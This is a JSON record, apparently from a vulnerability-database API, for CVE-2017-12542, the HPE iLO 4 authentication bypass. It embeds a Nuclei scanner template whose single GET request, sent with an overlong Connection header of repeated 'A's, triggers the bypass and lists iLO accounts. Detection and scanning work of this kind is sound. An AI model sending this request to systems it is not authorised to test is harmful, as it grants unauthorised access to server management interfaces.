{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2017-12542/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2017-12542/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2017-12542/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2017-12542/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2017-12542/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2017-12542"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2017-12542"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2017/CVE-2017-12542.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2017-12542\n\ninfo:\n  name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass\n  author: pikpikcu\n  severity: critical\n  description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability.\n  impact: |\n    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system.\n  remediation: |\n    Upgrade HPE Integrated Lights-out 4 (ILO4) to version 2.53 or later to mitigate this vulnerability.\n  reference:\n    - https://www.exploit-db.com/exploits/44005\n    - https://nvd.nist.gov/vuln/detail/CVE-2017-12542\n    - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us\n    - https://www.exploit-db.com/exploits/44005/\n    - http://www.securitytracker.com/id/1039222\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10\n    cve-id: CVE-2017-12542\n    epss-score: 0.99294\n    epss-percentile: 0.99938\n    cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: hp\n    product: integrated_lights-out_4_firmware\n  tags: cve,cve2017,ilo4,hpe,auth-bypass,edb,hp,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/rest/v1/AccountService/Accounts\"\n\n    headers:\n      Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"iLO User\"\n\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100e4b02a2bf077c3ef9cfc545c994558f2aa785f9594c865549a7a07e4dea867ec022100ed3b352bd4a6cd57b02a337aa3857d99dbdbd6f758f2a21ea526ee867b5dfc9d:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2017-12542"
}